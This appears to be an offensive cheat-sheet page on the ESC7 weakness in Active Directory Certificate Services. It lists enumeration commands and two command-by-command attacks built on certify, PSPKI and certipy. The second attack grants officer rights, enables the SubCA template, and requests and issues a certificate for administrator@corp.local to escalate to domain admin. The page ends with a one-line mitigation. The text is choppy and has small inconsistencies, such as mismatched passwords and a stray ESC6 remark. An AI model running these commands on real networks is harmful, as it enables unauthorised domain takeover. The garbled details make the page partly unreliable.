ESC7
Vulnerable Certificate Authority Access Control
where 2 sets of permissions poses security risks:
- ManageCA (or
ManageCertificates
) - ManageCertificates (or
Certificate Manager
)
Enumerate using certsrv.msc
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuthorityAcl | select -expand Access
Query CA with certutil (EditFlags
value)
Check if EDITF_ATTRIBUTESUBJECTALTNAME2
is set if the value is 1376590
.
PS /home/bobbuilder> certutil.exe -config "LAB-DC.lab.local\lab-LAB-DC-CA" -getreg "policy\EditFlags"
Enumerate using PSPKI
module
PS /home/bobbuilder> Import-Module .\PSPKI.ps1
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName LAB-DC.lab.local | Get-CertificationAuthorityAcl | select -ExpandProperty access
ManageCA
Templates with ManageCA enables the principal to manipulate settings remotely using PSPKI. This includes toggling the EDITF_ATTRIBUTESUBJECTALTNAME2
flag to permit SAN specification in any template, a critical aspect of domain escalation.
Windows
Attack 1
ESC6 attack got patch on May of 2022.
Note: this will not have any effect until the CA service (CertSvc) is restarted which ManageCA
users have but they can't do it remotely.
- Request Certificate Template
PS /home/bobbuilder> certify.exe request /ca:<ca> /template:ApprovalNeeded
- Import
PSPKI
module
Import-Module PSPKI
- Approve Pending Request
PS /home/bobbuilder> Get-CertificationAuthority -ComputerName dc.domain.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
- Download Pending Request
PS /home/bobbuilder> certify.exe download /ca:<ca> /id:336
Attack 2
For this attack we only need ManageCA
permission. We will need Manage Certificates
permission and SubCA
Certificate template enabled but they both can be enabled from ManageCA
- Grant
Manage Certificates
access (Optional, if we don't already)
certipy ca -ca 'corp-DC-CA' -add-officer john -username john@corp.local -password Passw0rd
- Enable
SubCA
Certificate template (Optional, if we don't already)
certipy ca -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -enable-template 'SubCA'
- Request certificate based on the
SubCA
template
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
- Issue the failed certificate
certipy ca -ca 'corp-DC-CA' -issue-request 785 -username john@corp.local -password Passw0rd
- Retrieve the issued certificate
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -retrieve 785
ManageCA
, Manage Certificates
and SubCA
Disable EDITF_ATTRIBUTESUBJECTALTNAME2
with PowerShell
$ConfigReader.SetConfigEntry(1114446,"EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy") $ConfigReader.GetConfigEntry("EditFlags","PolicyModules\CertificateAuthority_MicrosoftDefault.Policy")